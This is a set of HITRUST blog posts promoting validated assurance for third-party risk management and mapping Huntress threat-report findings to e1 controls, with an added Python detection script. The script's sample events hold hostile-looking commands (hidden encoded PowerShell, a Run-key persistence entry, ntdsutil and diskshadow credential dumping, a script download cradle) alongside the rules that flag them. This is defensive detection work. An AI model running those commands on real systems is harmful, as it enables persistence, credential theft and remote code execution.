Validated assurance is the new standard for third-party trust, providing verified, benchmarked, and quality-controlled proof of security that replaces manual, self-attested processes. It enables organizations to assess, monitor, and trust vendors with confidence, reducing complexity while increasing transparency across the entire third-party ecosystem.
In our previous post, we explored why traditional third-party risk management (TPRM) models are breaking down, burdened by inefficiency, inconsistency, and incomplete assurance. Now, let’s understand the solution: validated assurance.
What is validated assurance — and why does it matter?
Validated assurance is a model that proves security and compliance, instead of just claiming it. It relies on independent verification, standardized frameworks, and centralized quality assurance to deliver consistent, defensible evidence of a vendor’s cybersecurity and privacy posture.
In short, validated assurance means you don’t have to take a vendor’s word for it. Their controls have been tested, verified, and approved against a trusted, recognized standard.
This approach solves a critical problem for both organizations evaluating vendors and vendors being assessed. It replaces unverified, inconsistent evidence with transparent, comparable results that everyone can trust.
How does validated assurance fix the gaps in traditional TPRM?
Traditional third-party risk management relies on subjective, manual, and often redundant processes that create friction between risk teams and vendors. Validated assurance replaces this with standardization, evidence, and scalability.
| Common TPRM Challenge | How Validated Assurance Solves It |
| --- | --- |
| Manual questionnaires and inconsistent evidence | Standardized, verified assessments provide uniform results. |
| Self-attested claims and limited validation | Independent verification confirms the accuracy of control implementation. |
| Difficult to compare vendor maturity | Benchmarking and standardized scoring enable objective comparisons. |
| Point-in-time visibility | Continuous updates and periodic reviews ensure ongoing risk awareness. |
With validated assurance, organizations move from reactive oversight to proactive confidence, reducing both operational overhead and uncertainty.
How does HITRUST operationalize validated assurance?
HITRUST pioneered validated assurance by building it into every layer of its ecosystem.
- A unified framework
At the foundation is the HITRUST Framework, which harmonizes over 60 global regulations, standards, and best practices into one comprehensive control library. This ensures alignment across multiple requirements.
- Tiered assurance (e1, i1, r2)
Not all vendors require the same level of scrutiny. HITRUST’s tiered assessment model (e1, i1, r2) scales rigor to vendor criticality, so organizations can evaluate each vendor at an appropriate level without sacrificing consistency.
- Centralized quality assurance
Every validated assessment undergoes a centralized QA review by HITRUST, ensuring each certification meets the same defensibility and quality standards, making the results uniformly reliable.
- Threat-adaptive updates
The HITRUST Framework evolves frequently to keep pace with emerging threats, vulnerabilities, and regulatory changes. This threat-adaptive model ensures that vendor assessments remain aligned with the latest risk environment.
- Automation and interoperability
Through integrations with platforms like ServiceNow via the HITRUST TPRM Services (formerly known as HITRUST Assessment XChange), validated assurance becomes scalable. Organizations can automate evidence reuse, monitor vendor status in real time, and streamline reporting.
- Standardized control set
Because every assessment tests the same standardized control set, organizations know exactly which controls were tested and can build efficiencies around that shared baseline.
Who benefits from validated assurance?
Validated assurance is a win-win for both sides of the third-party risk equation.
Assessing organizations:
- Gain verified, comparable assurance across vendors.
- Reduce assessment time and resource strain.
- Build defensible confidence for boards, regulators, and auditors.
Vendors:
- Demonstrate security maturity once and reuse the certification multiple times.
- Reduce audit fatigue from repetitive questionnaires.
- Accelerate sales cycles with trusted, independently verified assurance.
In essence, validated assurance creates a shared ecosystem of trust, where proof replaces promises, and efficiency replaces redundancy.
What’s next?
The transition to validated assurance is more than an operational upgrade. It’s a strategic evolution.
Explore how validated assurance transforms third-party oversight into a measurable, defensible, and scalable model of trust in our new white paper: Redefining Third-Party Risk Management with the HITRUST Validated Assurance.
Validated Assurance: Redefining How Organizations Build Third-Party Trust
Traditional third-party risk management (TPRM) practices may not keep pace as they often rely on manual, self-attested, and inconsistent methods. As vendor ecosystems expand and the frequency and cost of breaches rise, organizations need a new approach — one built on verified, standardized, and defensible assurance like that offered by HITRUST.
What’s driving the third-party risk crisis?
The modern enterprise depends on thousands of third parties for everything from IT infrastructure to cloud services and data processing. According to SecurityScorecard and Cyentia 2024, the average Global 2000 organization now manages over 8,000 vendors providing nearly 18,000 IT products and services, each representing a potential point of risk.
The impact is real.
- 99% of Global 2000 organizations are connected to vendors that have experienced a cyber incident.
- The average third-party breach costs $4.91 million (IBM 2025).
These numbers reveal a growing truth: cybersecurity risk in the supply chain has become material to the enterprise. Even a single weak link can expose the entire ecosystem to breach and disruption.
Why is traditional TPRM challenging?
Legacy TPRM programs were designed for a simpler, slower world. Today, they rely on outdated processes that create friction, delay, and false confidence.
| Old TPRM Approach | Modern Reality | Consequence |
| --- | --- | --- |
| Manual questionnaires and spreadsheets | Thousands of vendors and complex data flows | Slow, inconsistent reviews |
| Self-attested vendor responses | No independent verification | False sense of security |
| Disconnected frameworks and formats | Diverse global standards | Difficult to compare or trust results |
| Human-intensive validation | Limited budgets and staff | Unsustainable at enterprise scale |
These inefficiencies leave teams overwhelmed and unable to keep pace with expanding vendor ecosystems. Instead of reducing risk, traditional TPRM often becomes an administrative burden that delays procurement and frustrates vendors.
What happens when TPRM becomes a bottleneck?
For most enterprises, the TPRM process has turned into a roadblock. Assessments can take weeks or months, draining staff resources and stalling business. Vendors often repeatedly fill out lengthy questionnaires for every customer, creating frustration on both sides.
The result?
- Procurement delays
- Slower time-to-market for services that depend on vendors
- Inconsistent risk visibility across vendors
- Friction with vendors forced to repeat assessments
In short, traditional TPRM may create more noise than insight, leaving organizations vulnerable to the very risks they’re trying to mitigate.
What’s the better way to manage third-party risk?
Security-mature organizations are shifting from self-attested trust to validated assurance — a model that uses verified, standardized, and quality-controlled assessments to prove that vendor controls are effective.
Validated assurance eliminates redundancy, improves consistency, and provides defensible, audit-ready proof of compliance. Rather than taking vendors at their word, organizations gain confidence from independently verified results.
With validated assurance:
- Risk decisions are based on evidence, not assumptions.
- Vendor reviews are faster and reusable.
- Security teams spend less time chasing documentation and more time managing risk.
It’s not just a better way to assess. It’s a smarter way to trust.
How can you learn more?
To understand how validated assurance transforms vendor oversight from a reactive burden into a scalable model of trust, download our latest white paper: Redefining Third-Party Risk Management with the HITRUST Validated Assurance.
Learn how HITRUST empowers organizations to address the challenge of vendor risk management and stay resilient against the growing wave of third-party breaches.
The Third-Party Risk Crisis: Why the Old Playbook No Longer Works
Takeaways
- Healthcare remains a top target for cyberattacks: Cybercriminals are intensifying attacks against healthcare organizations due to valuable patient data and outdated systems.
- Vendors are the new attack vector: Even the most secure organizations can be compromised through a trusted third party.
- HITRUST e1 provides proven protection: The HITRUST e1 offers a pragmatic, standardized way to verify that both organizations and their vendors have implemented critical cybersecurity controls to prevent, detect, and respond to today’s most prevalent threats.
Overview
The Huntress 2025 Cyber Threat Report analyzes attacks observed in 2024, showing that cybercriminals are repurposing sophisticated techniques for small and mid‑sized organizations. Healthcare was hit particularly hard because it holds valuable patient data and often relies on outdated systems. Threat actors frequently used malicious scripts, remote access Trojans (RATs), remote‑monitoring tool abuse, and ransomware. These patterns highlight the need for comprehensive security measures across the entire supply chain. One major risk associated with these attacks is that the threat actor may compromise enterprise systems via a third party. For example, any of your hundreds of software providers may be compromised by these attacks and used as a stepping stone into your customers’ environments.
Key threats and relevant e1 controls
Malicious scripts and fileless malware
- What Huntress saw: Malicious script executions were the most common attack vector in healthcare. Attackers used PowerShell or JavaScript to persist on hosts, modify the Windows Registry, or download additional malware.
- e1 controls: Deploy endpoint protection tools that can detect and block script‑based attacks and fileless malware. Enforce default‑deny rules on host‑based firewalls to prevent unauthorized outbound connections. Keep systems patched and configurations hardened to reduce exploitable vulnerabilities. Prohibit installation of unauthorized software and disable auto‑run features to limit untrusted code execution. Perform regular vulnerability scans and implement an incident response plan to catch and remediate malicious activity quickly.
Infostealers and credential harvesting
- What Huntress saw: Infostealers targeted healthcare to extract PHI and credentials. More than 38% of hands‑on‑keyboard activity involved network or domain reconnaissance, and attackers used tools such as Mimikatz to dump cached credentials.
- e1 controls: Enforce strong password policies and change default credentials on all systems. Require multi‑factor authentication for privileged accounts and remote access to limit the impact of stolen passwords. Review account privileges regularly, limit administrative rights, and use separate accounts for administrative duties. Enable comprehensive logging and protect audit trails to support investigation of credential misuse. Provide ongoing security awareness and phishing‑resistance training so staff recognize and report credential‑stealing attempts.
Ransomware, data theft, and extortion
- What Huntress saw: Ransomware in healthcare shifted toward data theft and extortion. Attackers combined data exfiltration with encryption to coerce victims, and the rise in cryptocurrency prices emboldened them.
- e1 controls: Maintain offline or immutable backups and test restoration procedures regularly. Establish a robust incident response capability that includes detection, containment, and recovery. Limit access to sensitive data to authorized personnel and encrypt data on mobile devices. Use email and web‑filtering technologies to block phishing emails and connections to known malicious domains.
Remote Access Trojans (RATs) and RMM abuse
- What Huntress saw: Attackers deployed Java‑based RATs (such as JRat and Adwind) and abused legitimate remote monitoring tools.
- e1 controls: Secure remote access with multi‑factor authentication and restrict the use of remote administration tools to authorized solutions. Segment networks with firewalls to separate internal systems from external networks and limit lateral movement. Maintain an accurate inventory of IT assets and forbid installation of unauthorized software, including unauthorized RMM tools. Configure devices to log off idle sessions automatically and assign unique user accounts to all personnel.
Lateral movement and network enumeration
- What Huntress saw: Attackers spent significant time mapping networks and domains. They used toolkits (e.g., ntdsutil, diskshadow) to dump credentials and move laterally, often exploiting legacy systems.
- e1 controls: Apply least‑privilege principles; only authorized individuals should have administrative rights, and privileged activities should be logged and reviewed. Use network segmentation and host‑based firewalls to restrict inter‑segment traffic and make lateral movement more difficult. Perform regular asset inventories and vulnerability scans to identify legacy systems and misconfigurations. Enforce change‑control procedures and maintain baseline configurations to prevent unauthorized changes. Collect and retain audit logs so lateral movement can be detected and investigated.
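As an added example, not code from the HITRUST post or from the Huntress report, the following Python script shows what the logging controls listed under "Malicious scripts and fileless malware" and "Lateral movement and network enumeration" buy a defender once process-creation events are actually collected: a handful of rules flag the behaviours the post describes (PowerShell launched with encoded or hidden-window arguments, Registry Run-key modification, script hosts retrieving content from the network, scripts started from a user's AppData folder, and the credential-dumping utilities ntdsutil, diskshadow and Mimikatz named above), and a second pass lists accounts with flagged activity on more than one host, the footprint that lateral movement leaves. The event fields, rule names, host names, user names, paths, the base64 fragment and every command line are constructed for this example.

```python
"""Added example, not code from the HITRUST post or the Huntress report: detection rules
run over constructed Windows process-creation records for the behaviours the post lists
(obfuscated script hosts, Run-key persistence, script-driven downloads, scripts run from
AppData, and the credential-dumping tools ntdsutil, diskshadow and Mimikatz).
Each rule returns (severity, detail) on a match, else None."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (the fields a 4688- or Sysmon-style event carries)."""
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str

@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    host: str
    user: str
    detail: str

def image_name(path: str) -> str:
    """Reduce a full executable path to its lower-cased file name for matching."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
CRED_DUMP_TOOLS = {"ntdsutil.exe", "diskshadow.exe", "mimikatz.exe"}  # tools named in the post
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)
HIDDEN_RE = re.compile(r"(?:^|\s)-w[a-z]*\s+hidden\b", re.I)
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(?:once)?\b", re.I)
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitsadmin", re.I)
USER_PROFILE_RE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)

def rule_credential_dump_tool(ev: ProcessEvent) -> Optional[Tuple[str, str]]:
    if image_name(ev.image) in CRED_DUMP_TOOLS:
        return "high", f"{image_name(ev.image)} started by {image_name(ev.parent_image)}"
    return None

def rule_obfuscated_script_host(ev: ProcessEvent) -> Optional[Tuple[str, str]]:
    if image_name(ev.image) in SCRIPT_HOSTS and (ENCODED_RE.search(ev.command_line)
                                                or HIDDEN_RE.search(ev.command_line)):
        return "high", "script host with encoded or hidden-window arguments"
    return None

def rule_run_key_persistence(ev: ProcessEvent) -> Optional[Tuple[str, str]]:
    if RUN_KEY_RE.search(ev.command_line) and image_name(ev.image) in SCRIPT_HOSTS | {"reg.exe"}:
        return "medium", "Registry Run key modified (autostart persistence)"
    return None

def rule_download_cradle(ev: ProcessEvent) -> Optional[Tuple[str, str]]:
    if image_name(ev.image) in SCRIPT_HOSTS and CRADLE_RE.search(ev.command_line):
        return "high", "script host retrieving content from the network"
    return None

def rule_script_from_user_profile(ev: ProcessEvent) -> Optional[Tuple[str, str]]:
    if image_name(ev.image) in SCRIPT_HOSTS and USER_PROFILE_RE.search(ev.command_line):
        return "medium", "script executed from a user-writable AppData path"
    return None

RULES = [rule_credential_dump_tool, rule_obfuscated_script_host, rule_run_key_persistence,
         rule_download_cradle, rule_script_from_user_profile]

def detect(events: List[ProcessEvent]) -> List[Finding]:
    """Run every rule over every event; one event may yield several findings."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(Finding(rule.__name__[len("rule_"):], hit[0], ev.host, ev.user, hit[1]))
    return findings

def lateral_movement_candidates(findings: List[Finding], min_hosts: int = 2) -> Dict[str, Set[str]]:
    """Accounts with flagged activity on several hosts: the first thing to investigate."""
    hosts_by_user: Dict[str, Set[str]] = defaultdict(set)
    for f in findings:
        hosts_by_user[f.user].add(f.host)
    return {u: h for u, h in hosts_by_user.items() if len(h) >= min_hosts}
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS32 = r"C:\Windows\System32"
# Constructed sample records; hosts, users, paths and the base64 fragment are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("WS-01", "jdoe", r"C:\Windows\explorer.exe", PS, "powershell.exe -nop -w hidden -enc QQBCAEMA"),
    ProcessEvent("WS-01", "jdoe", PS, SYS32 + r"\reg.exe",
                 r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\jdoe\AppData\Roaming\u.vbs"),
    ProcessEvent("DC-01", "svc_backup", SYS32 + r"\cmd.exe", SYS32 + r"\ntdsutil.exe", "ntdsutil.exe <constructed args>"),
    ProcessEvent("FS-02", "jdoe", SYS32 + r"\cmd.exe", SYS32 + r"\diskshadow.exe", r"diskshadow.exe /s C:\Windows\Temp\s.txt"),
    ProcessEvent("WS-03", "asmith", r"C:\Windows\explorer.exe", PS, r"powershell.exe -Command Get-ChildItem C:\Reports"),
    ProcessEvent("WS-02", "jdoe", SYS32 + r"\cmd.exe", SYS32 + r"\wscript.exe", r"wscript.exe C:\Users\jdoe\AppData\Roaming\u.vbs"),
    ProcessEvent("WS-01", "jdoe", PS, PS, r"powershell.exe -nop -c Invoke-WebRequest http://example.invalid/u.ps1 -OutFile C:\Windows\Temp\u.ps1"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.host} {f.user} {f.rule}: {f.detail}")
    print("accounts flagged on several hosts:", lateral_movement_candidates(detect(SAMPLE_EVENTS)))
```

Run stand-alone, the script prints one line per finding: in the constructed batch the jdoe account is flagged on three hosts while the ordinary Get-ChildItem on WS-03 produces nothing. The rules look only at image names and command-line patterns, so their value depends on the audit trail being complete and tamper-protected, which is precisely what the logging controls in the e1 list above require.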
Why vendor compliance with e1 requirements matters
The Huntress report shows that attackers exploit weaknesses not just in their primary targets but also in connected systems. Vendors often have direct network access or handle sensitive data on behalf of clients. If a vendor neglects patching, uses weak credentials, or does not enforce multi‑factor authentication, it can become the entry point for the same malicious scripts, infostealers, or remote‑access abuse described above.
Requiring vendors to adhere to the e1 requirements offers assurance that they implement comprehensive controls across governance, technical, and operational domains. These controls include endpoint security, firewalls, strong authentication, least‑privilege access, incident response, and employee training. Mandating an e1 certification in vendor contracts reduces third‑party risk, demonstrates due diligence, and aligns the entire ecosystem to best practices.
Conclusion
The 2025 Huntress report underscores the evolving threats facing healthcare organizations, from malicious scripts and infostealers to ransomware and lateral movement. The e1 requirements provide a structured set of practices that collectively mitigate these threats by addressing technical vulnerabilities, human factors, and incident response readiness. Organizations should not only implement these controls internally but also require their vendors to meet them. Doing so builds a resilient defense that protects patient data and ensures continuity of care in the face of an increasingly aggressive threat landscape.